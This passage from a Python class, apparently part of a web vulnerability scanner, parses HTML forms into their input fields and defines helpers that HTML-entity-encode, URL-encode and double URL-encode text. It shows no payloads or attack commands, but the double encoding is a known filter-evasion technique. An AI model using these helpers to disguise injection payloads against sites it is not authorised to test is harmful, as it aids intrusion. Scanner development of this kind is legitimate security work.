            for inp_match in re.finditer(r'<(?:input|textarea|select)[^>]*>', form_html, re.I):
                inp = inp_match.group(0)
                name_match = re.search(r'name=["\']([^"\']*)["\']', inp, re.I)
                type_match = re.search(r'type=["\']([^"\']*)["\']', inp, re.I)
                value_match = re.search(r'value=["\']([^"\']*)["\']', inp, re.I)

                if name_match:
                    inputs.append({
                        "name": name_match.group(1),
                        "type": type_match.group(1) if type_match else "text",
                        "value": value_match.group(1) if value_match else "",
                    })

            if inputs:
                forms.append({
                    "action": action,
                    "method": method,
                    "inputs": inputs,
                })

        return forms

    # ------------------------------------------------------------------
    # Encoding helpers
    # ------------------------------------------------------------------

    def _html_entity_encode(self, text: str) -> str:
        """Encode text as HTML entities."""
        return "".join(f"&#{ord(c)};" for c in text)

    def _url_encode(self, text: str) -> str:
        """URL-encode text."""
        return "".join(f"%{ord(c):02x}" if ord(c) > 127 or c in '<>"\' &;#' else c for c in text)

    def _double_url_encode(self, text: str) -> str:
        """Double URL-encode text."""
        return self._url_encode(self._url_encode(text))
